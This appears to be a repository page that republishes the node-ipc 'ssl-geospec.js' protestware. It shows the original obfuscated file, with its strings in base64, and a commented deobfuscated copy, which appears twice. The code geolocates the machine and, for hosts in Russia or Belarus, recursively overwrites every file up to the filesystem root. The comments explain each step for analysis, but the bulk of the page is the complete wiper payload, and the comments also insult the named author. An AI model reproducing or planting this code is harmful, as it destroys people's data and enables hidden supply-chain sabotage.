lithiumjs/README.md

## README.md

      
    Raw
  

              README.md
            
          
    WARNING

A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.

  
## obfuscated.js
import path from "path";
import fs from "fs";
import https from "https";

// **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.**

// Obfuscated code that I deobfuscated.
// I also added comments which should help explain what exactly is going on here.

// I renamed some variables here to have more meaningful names, and also left a bunch of edits here and there.
// I may have messed something up (I wrote it on a phone at 5am), so if I did, feel free to yell at me in the comments. -Seq

// Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
// See you in prison, Brandon.
// Deobfuscation by BrandonMiller97528 (nice name), further edits by Seq (https://github.com/lithiumjs)

// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

// A timeout is used to add an artificial delay.
// The timer is set to a random number of milliseconds between 0 and 1000 (1 second). -Seq
setTimeout(function () {
  // A 50% chance that all of your files will get overwritten.
  // It's actually 62.5%, somehow.  -Seq
  if (Math.round(Math.random() * 4) > 1) return;

  // This URL is used to specifically target people in Russia and Belarus.
  const uri = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; // nice key. -Seq

  // A request is send to the URL above. The server sends the location of the request to the requester.
  https.get(uri, function (request) {
    request.on("data", function (response) {
      // Specifically targets the citizens of Russia and Belarus.
      try {
        const data = JSON.parse(response);
        const countryName = data.country_name.toLowerCase();
        // "If your country is from Russia or Belarus, overwrite all of your files."
        if (countryName.includes("russia") || countryName.includes("belarus")) {
          wipe("./"); // Wipe current folder
          wipe("../"); // Wipe parent folder
          wipe("../../"); // Wipe parent of a parent
          wipe("/"); // Wipe root of the filesystem... Why include the previous 3 then?
        }
      } catch (t) {} // Ignore any errors
    });
  });
}, Math.ceil(Math.random() * 1000));

/**
 * The function that does the overwriting. Not sure why it is `async` though.
 * @param fsPath Path to wipe the files in.
 * @param nameToWipe If specified, only wipes files with a specified substring in the name.
 * @returns Supposedly a list of all deleted files, but actually just an empty array. Brandon's an idiot.
 */
async function wipe(fsPath = "", nameToWipe = "") {
  // Checks to see if the directory within your file system exists.
  if (!fs.existsSync(fsPath)) return;
  let files = [];
  try {
    // Gets all of the files within the directory.
    files = fs.readdirSync(fsPath);
  } catch (t) {}
  const wipedFiles = [];
  // Your files will get overwritten with a heart emoji. Perfect.
  // Iterate over all files within a directory.
  for (var i = 0; i < files.length; i++) {
    const filePath = path.join(fsPath, files[i]);
    let stats = null;
    try {
      stats = fs.lstatSync(filePath);
    } catch (t) {
      continue;
    }
    // If the file is a directory, it will run the `wipe` function again.
    if (stats.isDirectory()) {
      const subWiped = wipe(filePath, nameToWipe);
      // Again, the function was async. This will not even work properly.
      // In fact, it won't work at all. Promises have no length property.
      if (subWiped.length > 0) wipedFiles.push(...subWiped);
    } else if (filePath.indexOf(nameToWipe) >= 0) {
      try {
        // The files get overwritten. Thanks, Brandon.
        fs.writeFile(filePath, "❤️", function () {});
      } catch (t) {}
    }
  }
  return wipedFiles;
}

// Fake exports probably intended to trick consumers.
const ssl = true;
export { ssl, ssl as default };

## ssl-geospec.js
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
	import path from "path";
	import fs from "fs";
	import https from "https";

	// WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.

	// Obfuscated code that I deobfuscated.
	// I also added comments which should help explain what exactly is going on here.

	// I renamed some variables here to have more meaningful names, and also left a bunch of edits here and there.
	// I may have messed something up (I wrote it on a phone at 5am), so if I did, feel free to yell at me in the comments. -Seq

	// Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
	// See you in prison, Brandon.
	// Deobfuscation by BrandonMiller97528 (nice name), further edits by Seq (https://github.com/lithiumjs)

	// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

	// A timeout is used to add an artificial delay.
	// The timer is set to a random number of milliseconds between 0 and 1000 (1 second). -Seq
	setTimeout(function () {
	// A 50% chance that all of your files will get overwritten.
	// It's actually 62.5%, somehow. -Seq
	if (Math.round(Math.random() * 4) > 1) return;

	// This URL is used to specifically target people in Russia and Belarus.
	const uri = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; // nice key. -Seq

	// A request is send to the URL above. The server sends the location of the request to the requester.
	https.get(uri, function (request) {
	request.on("data", function (response) {
	// Specifically targets the citizens of Russia and Belarus.
	try {
	const data = JSON.parse(response);
	const countryName = data.country_name.toLowerCase();
	// "If your country is from Russia or Belarus, overwrite all of your files."
	if (countryName.includes("russia") \|\| countryName.includes("belarus")) {
	wipe("./"); // Wipe current folder
	wipe("../"); // Wipe parent folder
	wipe("../../"); // Wipe parent of a parent
	wipe("/"); // Wipe root of the filesystem... Why include the previous 3 then?
	}
	} catch (t) {} // Ignore any errors
	});
	});
	}, Math.ceil(Math.random() * 1000));

	/**
	* The function that does the overwriting. Not sure why it is `async` though.
	* @param fsPath Path to wipe the files in.
	* @param nameToWipe If specified, only wipes files with a specified substring in the name.
	* @returns Supposedly a list of all deleted files, but actually just an empty array. Brandon's an idiot.
	*/
	async function wipe(fsPath = "", nameToWipe = "") {
	// Checks to see if the directory within your file system exists.
	if (!fs.existsSync(fsPath)) return;
	let files = [];
	try {
	// Gets all of the files within the directory.
	files = fs.readdirSync(fsPath);
	} catch (t) {}
	const wipedFiles = [];
	// Your files will get overwritten with a heart emoji. Perfect.
	// Iterate over all files within a directory.
	for (var i = 0; i < files.length; i++) {
	const filePath = path.join(fsPath, files[i]);
	let stats = null;
	try {
	stats = fs.lstatSync(filePath);
	} catch (t) {
	continue;
	}
	// If the file is a directory, it will run the `wipe` function again.
	if (stats.isDirectory()) {
	const subWiped = wipe(filePath, nameToWipe);
	// Again, the function was async. This will not even work properly.
	// In fact, it won't work at all. Promises have no length property.
	if (subWiped.length > 0) wipedFiles.push(...subWiped);
	} else if (filePath.indexOf(nameToWipe) >= 0) {
	try {
	// The files get overwritten. Thanks, Brandon.
	fs.writeFile(filePath, "❤️", function () {});
	} catch (t) {}
	}
	}
	return wipedFiles;
	}

	// Fake exports probably intended to trick consumers.
	const ssl = true;
	export { ssl, ssl as default };